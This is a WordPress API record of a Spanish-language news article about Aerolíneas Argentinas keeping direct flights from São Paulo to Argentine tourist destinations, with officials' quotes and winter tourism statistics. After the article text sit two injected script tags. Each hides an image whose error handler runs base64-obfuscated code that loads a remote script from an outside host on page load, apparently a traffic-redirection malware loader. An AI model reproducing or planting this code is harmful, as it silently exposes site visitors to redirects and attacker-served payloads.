{"id":1246,"date":"2022-08-05T14:11:13","date_gmt":"2022-08-05T17:11:13","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1246"},"modified":"2025-08-14T00:39:16","modified_gmt":"2025-08-14T03:39:16","slug":"lammens-guerrera-y-ceriani-anunciaron-la-continuidad-de-vuelos-directos-desde-brasil-hacia-destinos-turisticos-nacionales","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1246","title":{"rendered":"Lammens, Guerrera y Ceriani anunciaron la continuidad de vuelos directos desde Brasil hacia destinos tur\u00edsticos nacionales"},"content":{"rendered":"\n<h2 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\">Balance de la exitosa temporada de invierno<\/h2>\n\n\n\n<p>Aerol\u00edneas Argentinas confirm\u00f3 la continuidad de su operaci\u00f3n desde San Pablo a Bariloche, C\u00f3rdoba-El Calafate y Salta-Tucum\u00e1n. El anuncio se hizo en el marco de la presentaci\u00f3n que tuvo lugar en el auditorio de Aerol\u00edneas Argentinas en Aeroparque. Adem\u00e1s, se realiz\u00f3 un balance general de la temporada invernal. Participaron el ministro de Turismo y Deportes, Mat\u00edas Lammens; el ministro de Transporte, Alexis Guerrera; la gobernadora de R\u00edo Negro, Arabela Carreras; el presidente de Aerol\u00edneas Argentinas, Pablo Ceriani, y otras autoridades nacionales, como as\u00ed tambi\u00e9n representantes del sector tur\u00edstico.<\/p>\n\n\n\n<p>Desde el 21 de septiembre, la ruta entre San Pablo y Bariloche continuar\u00e1 con un 1 vuelo semanal. En tanto que San Pablo-C\u00f3rdoba\u2013El Calafate contar\u00e1 con 2 frecuencias semanales y por \u00faltimo San Pablo\u2013Salta\u2013Tucum\u00e1n tambi\u00e9n funcionar\u00e1 con 2 frecuencias semanales. Cabe destacar que, durante el mes de julio, en la red de vuelos desde Brasil que comprende las rutas desde San Pablo, R\u00edo de Janeiro, Brasilia, Curitiba, Porto Alegre y Salvador de Bah\u00eda viajaron 82.662 pasajeros, de los cuales 60.000 fueron turistas que visitaron el pa\u00eds, alcanzando as\u00ed el 95% de los pasajeros pre-COVID. La continuidad de las rutas busca potenciar la conectividad con el mercado brasile\u00f1o, que lidera las estad\u00edsticas de turismo receptivo.<\/p>\n\n\n\n<p>Durante la conferencia, Mat\u00edas Lammens asegur\u00f3: \u201cSab\u00edamos que \u00edbamos a tener una muy buena temporada de invierno, pero no esper\u00e1bamos estos n\u00fameros tan importantes, con niveles por encima de la prepandemia. Todo esto no hubiera sido posible sin un plan articulado para recuperar el turismo receptivo\u201d.<\/p>\n\n\n\n<p>En tanto que Alexis Guerrera dijo: \u201cLa articulaci\u00f3n por parte del Estado entre todos los actores, tanto del sistema de transporte como del sector tur\u00edstico, ha sido vital en la pospandemia para tener una salida como la que estamos teniendo, con estos buenos n\u00fameros. Tenemos la profunda convicci\u00f3n de que la existencia de una l\u00ednea a\u00e9rea de bandera es un instrumento esencial para la llegada de turistas y tambi\u00e9n para la conectividad de los argentinos\u201d.<\/p>\n\n\n\n<p>Por su parte, Arabela Carreras destac\u00f3: \u201cLa conectividad es fundamental porque cambia la realidad de los ciudadanos y es un motor esencial para la recuperaci\u00f3n econ\u00f3mica que estamos observando en el sector. Por eso es central el rol de Aerol\u00edneas para reconstruir la red de vuelos no s\u00f3lo de nuestra provincia sino de todo el pa\u00eds\u201d.<\/p>\n\n\n\n<p>Por \u00faltimo, Pablo Ceriani expres\u00f3: \u201cHoy estamos hablando ya de crecimiento, algo que nos pone muy felices porque hemos superado etapas muy duras, y lo hicimos trabajando con el foco en el turismo receptivo y fundamentalmente en el mercado brasilero que tanto inter\u00e9s tiene por descubrir las atracciones tur\u00edsticas de la Argentina\u201d.<\/p>\n\n\n\n<p>De acuerdo a lo informado por el Ministerio de Turismo y Deportes de la Naci\u00f3n, m\u00e1s de 440 mil turistas del extranjero ingresaron al pa\u00eds durante la temporada, con gastos superiores a los USD 357 millones en el sector tur\u00edstico. Seg\u00fan las proyecciones, se espera la llegada de un mill\u00f3n de personas a la Argentina durante este invierno. Brasil representa el 22% de los visitantes extranjeros que recibi\u00f3 nuestro pa\u00eds en lo que va de 2022: m\u00e1s de 350.000 turistas y 650.000 excursionistas brasile\u00f1os llegaron a la Argentina, superando el mill\u00f3n de visitantes en total. El mes pasado, se registr\u00f3 una recuperaci\u00f3n del 60% en comparaci\u00f3n con la \u00faltima temporada prepandemia, con una fuerte tendencia al alza en las \u00faltimas semanas.<\/p>\n\n\n\n<p>En el caso de los vuelos dom\u00e9sticos, la empresa transport\u00f3 881.369 pasajeros, lo que representa el 101% de los pasajeros respecto a la temporada 2019. Los destinos con mejor performance fueron: Bariloche, C\u00f3rdoba, Mendoza, Neuqu\u00e9n, Salta, Ushuaia, Iguaz\u00fa, San Martin de Los Andes y El Calafate, entre otros. Adem\u00e1s, durante la presentaci\u00f3n, se destac\u00f3 la recuperaci\u00f3n de los corredores Petrolero y Tur\u00edstico, as\u00ed como tambi\u00e9n la ampliaci\u00f3n de los vuelos que no pasan por Buenos Aires o \u201crutas federales\u201d que actualmente son 42, duplicando la cantidad existente en 2019. Por \u00faltimo, vale mencionar el aporte del resto de las rutas internacionales de Aerol\u00edneas hacia la Argentina, que trajeron al pa\u00eds a 37.939 turistas, siendo Santiago de Chile, Asunci\u00f3n, Montevideo, Lima y las dos rutas desde USA (Miami y Nueva York) las m\u00e1s relevantes<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Balance de la exitosa temporada de invierno Aerol\u00edneas Argentinas confirm\u00f3 la continuidad de su operaci\u00f3n desde San Pablo a Bariloche, C\u00f3rdoba-El Calafate y Salta-Tucum\u00e1n. El anuncio se hizo en el marco de la presentaci\u00f3n que tuvo lugar en el auditorio de Aerol\u00edneas Argentinas en Aeroparque. Adem\u00e1s, se realiz\u00f3 un balance general de la temporada invernal. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1247,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5,18],"tags":[],"class_list":{"0":"post-1246","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-buses-y-aeropuertos","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1246"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1246"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1246\/revisions"}],"predecessor-version":[{"id":7405,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1246\/revisions\/7405"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1247"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1246"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1246"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1246"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}